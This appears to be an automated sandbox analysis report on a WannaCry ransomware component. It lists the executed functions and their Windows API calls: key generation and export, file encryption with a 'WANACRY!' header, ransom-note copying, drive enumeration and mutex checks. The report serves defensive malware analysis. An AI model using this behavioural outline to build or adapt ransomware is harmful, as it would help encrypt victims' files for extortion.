2220->2211 2222 100052cd GlobalFree FlushFileBuffers CloseHandle DeleteFileW 2221->2222 2224 10005263 2221->2224 2222->2215 2223 10005269 GetDiskFreeSpaceExW 2223->2222 2223->2224 2224->2222 2224->2223 2225 1000529b WriteFile 2224->2225 2225->2222 2226 100052b3 Sleep 2225->2226 2226->2225 2227 100052bd Sleep 2226->2227 2227->2222 2227->2223 2229 10005060 14 API calls 2228->2229 2230 10005150 swprintf DeleteFileW 2229->2230 2230->2219 2240 10003560 2241 1000356e ??3@YAXPAX 2240->2241 2242 10003595 ??3@YAXPAX 2240->2242 2241->2241 2241->2242 2248 10006ef0 ??3@YAXPAX 2290 10001660 2291 10001680 14 API calls 2290->2291 2292 10001668 2291->2292 2293 10001678 2292->2293 2294 1000166f ??3@YAXPAX 2292->2294 2294->2293 2249 10004f20 swprintf MultiByteToWideChar CopyFileW 2250 10005024 swprintf CopyFileW 2249->2250 2251 10004fba GetUserNameW _wcsicmp 2249->2251 2251->2250 2252 10005013 SystemParametersInfoW 2251->2252 2252->2250 2297 100053f0 GetUserNameW _wcsicmp 2298 10005452 2297->2298 2299 10005444 2297->2299 2300 100027f0 168 API calls 2298->2300 2301 10005468 2300->2301 2296 10006e16 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 2253 10006cdf 2254 10006cf2 2253->2254 2255 10006cfb 2253->2255 2256 10006d23 2254->2256 2258 10006d43 2254->2258 2259 10006c34 3 API calls 2254->2259 2255->2254 2255->2256 2261 10006c34 2255->2261 2258->2256 2260 10006c34 3 API calls 2258->2260 2259->2258 2260->2256 2262 10006c3c 2261->2262 2263 10006c5d malloc 2262->2263 2264 10006c72 2262->2264 2266 10006c9c 2262->2266 2263->2264 2265 10006c76 _initterm 2263->2265 2264->2254 2265->2264 2266->2264 2267 10006cc9 free 2266->2267 2267->2264

    Executed Functions

    Function 10002300, Relevance: 49.4, APIs: 23, Strings: 5, Instructions: 373
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 10002332
      • Part of subcall function 10003730: ??2@YAPAXI@Z.MSVCRT ref: 10003732
    • swprintf.MSVCRT ref: 10002388
    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00000000,?), ref: 1000239E
      • Part of subcall function 10002F70: GetTempFileNameW.KERNELBASE(?,~SD,00000000,00000000), ref: 10002FA1
      • Part of subcall function 10002F70: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000002,00000000), ref: 10002FBB
      • Part of subcall function 10002F70: CloseHandle.KERNEL32(00000000), ref: 10002FC8
      • Part of subcall function 10002F70: DeleteFileW.KERNELBASE(00000000), ref: 10002FD3
    • wcscmp.MSVCRT ref: 10002442
    • wcscmp.MSVCRT ref: 10002459
    • swprintf.MSVCRT(?,%s\%s,?,?), ref: 10002480
    • wcsncpy.MSVCRT ref: 100025EE
      • Part of subcall function 100032C0: _wcsnicmp.MSVCRT ref: 100032CF
      • Part of subcall function 100032C0: wcsstr.MSVCRT ref: 100032E8
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 10003309
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 10003323
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 1000333D
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 10003357
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 10003371
      • Part of subcall function 100032C0: wcsstr.MSVCRT ref: 1000338B
      • Part of subcall function 100032C0: wcsstr.MSVCRT ref: 100033A5
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 100033C3
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 100033DD
      • Part of subcall function 100032C0: _wcsicmp.MSVCRT ref: 100033F7
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 100024BE
    • wcslen.MSVCRT ref: 100024CC
    • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 100024E2
      • Part of subcall function 100035C0: ??2@YAPAXI@Z.MSVCRT ref: 100035CF
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 10002516
    • wcscmp.MSVCRT ref: 10002535
    • wcscmp.MSVCRT ref: 1000254C
    • wcscmp.MSVCRT ref: 10002563
      • Part of subcall function 10002D60: wcsrchr.MSVCRT ref: 10002D6A
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002D8B
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002D9E
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002DB1
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002DD7
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002DFC
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002E2D
      • Part of subcall function 10002D60: _wcsicmp.MSVCRT ref: 10002E47
    • wcsncpy.MSVCRT ref: 100025D7
    • FindNextFileW.KERNELBASE(?,?), ref: 10002634
    • FindClose.KERNEL32(?), ref: 10002643
    • ??3@YAXPAX@Z.MSVCRT ref: 10002772
      • Part of subcall function 10002940: wcscat.MSVCRT ref: 1000298D
      • Part of subcall function 10002940: wcscat.MSVCRT ref: 1000299B
      • Part of subcall function 10002940: DeleteFileW.KERNEL32(?), ref: 100029B2
      • Part of subcall function 10003760: ??2@YAPAXI@Z.MSVCRT ref: 10003771
    • _wcsnicmp.MSVCRT ref: 100026A7
    • ??3@YAXPAX@Z.MSVCRT ref: 100027A2
      • Part of subcall function 10003200: swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 1000321A
      • Part of subcall function 10003200: CopyFileW.KERNEL32(@Please_Read_Me@.txt,?,00000001), ref: 1000322F
      • Part of subcall function 10003240: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 1000325A
      • Part of subcall function 10003240: CopyFileW.KERNEL32(@WanaDecryptor@.exe.lnk,?,00000001), ref: 1000326F
      • Part of subcall function 10003280: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe), ref: 1000329A
      • Part of subcall function 10003280: CopyFileW.KERNEL32(@WanaDecryptor@.exe,?,00000001), ref: 100032AF
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 100023D2
      • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 10002404
    • ??3@YAXPAX@Z.MSVCRT ref: 100027BC
      • Part of subcall function 10003620: ??3@YAXPAX@Z.MSVCRT ref: 10003658
      • Part of subcall function 10003620: ??3@YAXPAX@Z.MSVCRT ref: 10003676
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 100011D0, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100
    APIs
    • GetCurrentProcess.KERNEL32 ref: 100011E4
    • OpenProcessToken.ADVAPI32(00000000), ref: 100011EB
    • GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 10001214
    • GetLastError.KERNEL32 ref: 1000121A
    • GlobalAlloc.KERNEL32(00000040,?), ref: 10001234
    • GetTokenInformation.ADVAPI32(?,00000001,00000000,?,?), ref: 1000124E
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 1000125F
    • GetProcAddress.KERNEL32(00000000,ConvertSidToStringSidW), ref: 10001275
    • wcscpy.MSVCRT ref: 100012AB
    • GlobalFree.KERNEL32(00000000), ref: 100012B9
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004040, Relevance: 10.6, APIs: 7, Instructions: 110
    APIs
    • CryptExportKey.ADVAPI32(?,00000000,?,00000000,00000000,00000008), ref: 10004087
    • GlobalAlloc.KERNEL32(00000000,00000008), ref: 1000409E
    • CryptExportKey.ADVAPI32(?,00000000,?,00000000,00000000,00000008), ref: 100040C0
    • _local_unwind2.MSVCRT ref: 100040D0
    • CreateFileA.KERNEL32(10003B63,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10004101
    • WriteFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 10004122
    • _local_unwind2.MSVCRT ref: 10004132
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003F00, Relevance: 10.6, APIs: 7, Instructions: 107
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10003F45
    • GetFileSize.KERNEL32(00000000,00000000), ref: 10003F5B
    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10003F8A
    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10003FA2
    • CryptImportKey.ADVAPI32(76E76DBE,00000000,?,00000000,00000000,?), ref: 10003FC5
    • _local_unwind2.MSVCRT ref: 10003FD5
    • _local_unwind2.MSVCRT ref: 10004017
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004170, Relevance: 7.7, APIs: 5, Instructions: 168
    APIs
    • CryptExportKey.ADVAPI32(?,00000000,?,00000000,?,?,00000008,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041AD
    • CryptGetKeyParam.ADVAPI32(?,00000008,?,?,00000000,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100041DF
    • GlobalAlloc.KERNEL32(00000000,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 10004229
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,?,?,?,10003C7F,?,?,?,00000007,00000000), ref: 100042BA
    • GlobalFree.KERNEL32(?), ref: 10004320
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003AC0, Relevance: 4.6, APIs: 3, Instructions: 97
    APIs
      • Part of subcall function 10003A80: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,76E76DBE,76E76DBE,10003D9E,?,76E76DBE,00000000), ref: 10003A9D
    • CryptImportKey.ADVAPI32(?,1000D054,00000114,?,?,00000008,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003AF9
      • Part of subcall function 10003C00: CryptDestroyKey.ADVAPI32(?,?,00000000,10003B1E,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003C0F
    • CryptImportKey.ADVAPI32(?,1000CF40,00000114,00000000,00000000,0000000C,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B36
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BBB
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BD0
      • Part of subcall function 10003BB0: CryptReleaseContext.ADVAPI32(?,00000000,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BE7
      • Part of subcall function 10004350: CryptGenKey.ADVAPI32(?,00000001,08000001,?,10003B4D,?,00000008), ref: 10004361
      • Part of subcall function 10004040: CryptExportKey.ADVAPI32(?,00000000,?,00000000,00000000,00000008), ref: 10004087
      • Part of subcall function 10004040: GlobalAlloc.KERNEL32(00000000,00000008), ref: 1000409E
      • Part of subcall function 10004040: CryptExportKey.ADVAPI32(?,00000000,?,00000000,00000000,00000008), ref: 100040C0
      • Part of subcall function 10004040: _local_unwind2.MSVCRT ref: 100040D0
      • Part of subcall function 10004040: CreateFileA.KERNEL32(10003B63,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10004101
      • Part of subcall function 10004040: WriteFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 10004122
      • Part of subcall function 10004040: _local_unwind2.MSVCRT ref: 10004132
      • Part of subcall function 10003C40: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 10003CA3
      • Part of subcall function 10003C40: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000008), ref: 10003CB8
      • Part of subcall function 10003C40: WriteFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 10003CD3
      • Part of subcall function 10003C40: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 10003CE3
      • Part of subcall function 10003C40: GlobalFree.KERNEL32(00000000), ref: 10003CE7
    • CryptDestroyKey.ADVAPI32(?,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B9D
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10003C00, Relevance: 1.5, APIs: 1, Instructions: 20
    APIs
    • CryptDestroyKey.ADVAPI32(?,?,00000000,10003B1E,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003C0F
      • Part of subcall function 10003F00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10003F45
      • Part of subcall function 10003F00: GetFileSize.KERNEL32(00000000,00000000), ref: 10003F5B
      • Part of subcall function 10003F00: GlobalAlloc.KERNEL32(00000000,00000000), ref: 10003F8A
      • Part of subcall function 10003F00: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10003FA2
      • Part of subcall function 10003F00: CryptImportKey.ADVAPI32(76E76DBE,00000000,?,00000000,00000000,?), ref: 10003FC5
      • Part of subcall function 10003F00: _local_unwind2.MSVCRT ref: 10003FD5
      • Part of subcall function 10003F00: _local_unwind2.MSVCRT ref: 10004017
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10004350, Relevance: 1.5, APIs: 1, Instructions: 11
    APIs
    • CryptGenKey.ADVAPI32(?,00000001,08000001,?,10003B4D,?,00000008), ref: 10004361
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10001960, Relevance: 75.8, APIs: 41, Strings: 2, Instructions: 598
    APIs
    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001A21
    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 10001A57
    • GetFileSizeEx.KERNEL32(00000000,?,?,?), ref: 10001A7C
    • GetFileTime.KERNEL32(00000000,?,?,?,?,?), ref: 10001AA7
    • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 10001AC0
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 10001B00
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 10001B3A
    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 10001B5D
    • _local_unwind2.MSVCRT ref: 10001B78
    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 10001BAB
    • swprintf.MSVCRT(?,%s%s,?,1000CBE4,?,?), ref: 10001BCC
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 10001BEE
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 10001C1A
    • ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 10001C71
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,?), ref: 10001C96
    • WriteFile.KERNEL32(?,?,00010000,?,00000000), ref: 10001CAE
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 10001CDF
    • WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001CFB
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 10001D20
    • rand.MSVCRT ref: 10001D54
      • Part of subcall function 10004370: EnterCriticalSection.KERNEL32(?,00000010,?,?,?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043CA
      • Part of subcall function 10004370: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,10001DBA,?,00000000,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043E7
      • Part of subcall function 10004370: LeaveCriticalSection.KERNEL32(?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 100043F2
      • Part of subcall function 10004370: LeaveCriticalSection.KERNEL32(?,?,?,10001DBA,?,00000010,?,00000200,?,?), ref: 10004401
      • Part of subcall function 10005DC0: ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 10005DDF
      • Part of subcall function 10005DC0: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005DEF
      • Part of subcall function 10005DC0: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E18
      • Part of subcall function 10005DC0: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E28
      • Part of subcall function 10005DC0: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 10005E51
      • Part of subcall function 10005DC0: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10005E61
    • WriteFile.KERNEL32(?,WANACRY!,00000008,00010000,00000000), ref: 10001E22
    • WriteFile.KERNEL32(?,00000200,00000004,00010000,00000000), ref: 10001E43
    • WriteFile.KERNEL32(?,?,00000200,00010000,00000000), ref: 10001E69
    • WriteFile.KERNEL32(?,00000004,00000004,00010000,00000000), ref: 10001E87
    • WriteFile.KERNEL32(?,?,00000008,00010000,00000000), ref: 10001EA8
    • SetFilePointer.KERNEL32(?,FFFF0000,00000000,00000002,?,?), ref: 10001EEF
    • ReadFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001F0B
    • WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10001F5C
    • SetFilePointer.KERNEL32(?,00010000,00000000,00000000,?,?), ref: 10001F84
    • ReadFile.KERNEL32(?,?,00100000,00010000,00000000), ref: 10001FE8
      • Part of subcall function 10006940: ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006959
      • Part of subcall function 10006940: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006969
      • Part of subcall function 10006940: ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006A54
      • Part of subcall function 10006940: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006A64
      • Part of subcall function 10006940: ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8CC), ref: 10006B1F
      • Part of subcall function 10006940: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B2F
      • Part of subcall function 10006940: ??0exception@@QAE@ABQBD@Z.MSVCRT(1000D8D0), ref: 10006B85
      • Part of subcall function 10006940: _CxxThrowException.MSVCRT(?,1000AF00), ref: 10006B95
    • WriteFile.KERNEL32(?,?,00010000,00010000,00000000), ref: 10002072
    • _local_unwind2.MSVCRT ref: 1000208E
    • SetFileTime.KERNELBASE(?,?,?,?,?,?), ref: 100020CD
    • CloseHandle.KERNEL32(?), ref: 100020DA
    • CloseHandle.KERNEL32(?), ref: 100020E1
    • MoveFileW.KERNEL32(?,?), ref: 10002101
    • SetFileAttributesW.KERNELBASE(?,00000080,?,?), ref: 10002119
    • DeleteFileW.KERNEL32(?,?,?), ref: 10002128
    • CloseHandle.KERNEL32(?), ref: 10002130
    • MoveFileW.KERNEL32(?,?), ref: 1000214D
    • _local_unwind2.MSVCRT ref: 1000218F
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1859744444.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000005.00000002.1859737055.10000000.00000004.sdmp
    • Associated: 00000005.00000002.1859754028.10007000.00000002.sdmp
    • Associated: 00000005.00000002.1859762288.1000C000.00000004.sdmp
    • Associated: 00000005.00000002.1859770483.1000E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_10000000_tasksche.jbxd
    Function 10005AE0, Relevance: 59.7, APIs: 28, Strings: 6, Instructions: 223
    APIs
      • Part of subcall function 10004690: CreateMutexA.KERNELBASE(00000000,00000001,MsWinZonesCacheCounterMutexA,?,10005B11), ref: 1000469A
      • Part of subcall function 10004690: GetLastError.KERNEL32(?,10005B11), ref: 100046A6
      • Part of subcall function 10004690: CloseHandle.KERNEL32(00000000), ref: 100046B4
    • GetModuleFileNameW.KERNEL32(?,?,00000103), ref: 10005B45
    • wcsrchr.MSVCRT ref: 10005B58
    • wcsrchr.MSVCRT ref: 10005B68
    • SetCurrentDirectoryW.KERNEL32(?), ref: 10005B75
      • Part of subcall function 10001000: fopen.MSVCRT ref: 1000101B
      • Part of subcall function 10001000: fread.MSVCRT ref: 1000103B
      • Part of subcall function 10001000: fwrite.MSVCRT ref: 10001048
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001056
      • Part of subcall function 10001000: fclose.MSVCRT ref: 10001064
      • Part of subcall function 100012D0: GetUserNameW.ADVAPI32 ref: 10001321
      • Part of subcall function 100012D0: _wcsicmp.MSVCRT ref: 10001331
      • Part of subcall function 10003410: LoadLibraryA.KERNEL32(kernel32.dll), ref: 10003433
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,CreateFileW,?), ref: 10003450
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,WriteFile), ref: 1000345D
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,ReadFile), ref: 1000346A
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 10003477
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 10003484
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 10003491
      • Part of subcall function 10003410: GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 1000349E
    • sprintf.MSVCRT ref: 10005BBA
    • sprintf.MSVCRT ref: 10005BCA
    • sprintf.MSVCRT ref: 10005BDA
      • Part of subcall function 10004600: OpenMutexA.KERNEL32(00100000,00000001,Global\MsWinZonesCacheCounterMutexW), ref: 10004610
      • Part of subcall function 10004600: CloseHandle.KERNEL32(00000000), ref: 1000461B
      • Part of subcall function 10004600: sprintf.MSVCRT ref: 1000463F
      • Part of subcall function 10004600: CreateMutexA.KERNELBASE(00000000,00000001,?), ref: 10004651
      • Part of subcall function 10004600: GetLastError.KERNEL32 ref: 1000465D
      • Part of subcall function 10004600: CloseHandle.KERNEL32(00000000), ref: 1000466B
    • CloseHandle.KERNEL32(00000000), ref: 10005D5E
      • Part of subcall function 10004500: sprintf.MSVCRT ref: 10004528
      • Part of subcall function 10004500: GetFileAttributesA.KERNEL32(?), ref: 1000453C
      • Part of subcall function 10004500: GetFileAttributesA.KERNEL32(00000000.pky), ref: 10004548
    • ??2@YAPAXI@Z.MSVCRT ref: 10005C00
    • CloseHandle.KERNEL32(00000000), ref: 10005D3B
      • Part of subcall function 10003A10: InitializeCriticalSection.KERNEL32(?,76E76DBE,10004558), ref: 10003A28
      • Part of subcall function 10003AC0: CryptImportKey.ADVAPI32(?,1000D054,00000114,?,?,00000008,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003AF9
      • Part of subcall function 10003AC0: CryptImportKey.ADVAPI32(?,1000CF40,00000114,00000000,00000000,0000000C,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B36
      • Part of subcall function 10003AC0: CryptDestroyKey.ADVAPI32(?,?,?,00000000,00000000,10005C48,00000000.pky,00000000.eky), ref: 10003B9D
      • Part of subcall function 100046D0: CreateFileA.KERNEL32(00000000.res,80000000,00000001,00000000,00000003,00000000,00000000), ref: 100046E6
      • Part of subcall function 100046D0: ReadFile.KERNEL32(00000000,1000DC68,00000088,?,00000000), ref: 10004712
      • Part of subcall function 100046D0: CloseHandle.KERNEL32(00000000), ref: 10004719
    • DeleteFileA.KERNELBASE(00000000.res,00000000.pky,00000000.eky), ref: 10005C66
      • Part of subcall function 10004420: CryptGenRandom.ADVAPI32(?,?,?,10005C8E,1000DC68,00000008), ref: 1000442E
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BBB
      • Part of subcall function 10003BB0: CryptDestroyKey.ADVAPI32(?,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BD0
      • Part of subcall function 10003BB0: CryptReleaseContext.ADVAPI32(?,00000000,76E76DBE,10003EFD,10003EE0,?,?,?,?,?,?,?,76E76DBE,00000000), ref: 10003BE7
    • CreateThread.KERNEL32(00000000,00000000,10004790,00000000,00000000,00000000), ref: 10005CAE
    • CloseHandle.KERNEL32(00000000), ref: 10005CBB
    • Sleep.KERNEL32(00000064,?,1000DC68,00000008), ref: 10005CC5
    • CreateThread.KERNEL32(00000000,00000000,100045C0,00000000,00000000,00000000), ref: 10005CD1
    • CloseHandle.KERNEL32(00000000), ref: 10005CD8
    • Sleep.KERNEL32(00000064,?,1000DC68,00000008), ref: 10005CDC
    • CreateThread.KERNEL32(00000000,00000000,10005730,00000000,00000000,00000000), ref: 10005CE8
    • Sleep.KERNEL32(00000064,?,1000DC68,00000008), ref: 10005CEE
    • CreateThread.KERNEL32(00000000,00000000,10005300,00000000,00000000,00000000), ref: 10005CFF
    • CloseHandle.KERNEL32(00000000), ref: 10005D06
    • Sleep.KERNEL32(00000064,?,1000DC68,00000008), ref: 10005D0A
    • CreateThread.KERNEL32(00000000,00000000,10004990,00000000,00000000,00000000), ref: 10005D1B
    • CloseHandle.KERNEL32(00000000), ref: 10005D22
    • Sleep.KERNEL32(00000064,?,1000DC68,00000008), ref: 10005D26
      • Part of subcall function 100057C0: GetFileAttributesA.KERNEL32(f.wnry,00000000.pky,10005340,1000DD8C,76E6DE72), ref: 10005819
      • Part of subcall function 100057C0: time.MSVCRT ref: 1000583D
      • Part of subcall function 100057C0: sprintf.MSVCRT ref: 1000585F
      • Part of subcall function 100057C0: InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100058C1
      • Part of subcall function 100057C0: GetLogicalDrives.KERNEL32 ref: 1000591C
      • Part of subcall function 100057C0: GetDriveTypeW.KERNEL32(?), ref: 10005964
      • Part of subcall function 100057C0: GetDriveTypeW.KERNEL32(?), ref: 10005977
      • Part of subcall function 100057C0: InterlockedExchange.KERNEL32(1000D4E4,000000FF), ref: 100059A4
      • Part of subcall function 100057C0: sprintf.MSVCRT ref: 100059DD
      • Part of subcall function 100057C0: time.MSVCRT ref: 100059F6
      • Part of subcall function 100057C0: sprintf.MSVCRT ref: 10005A1F
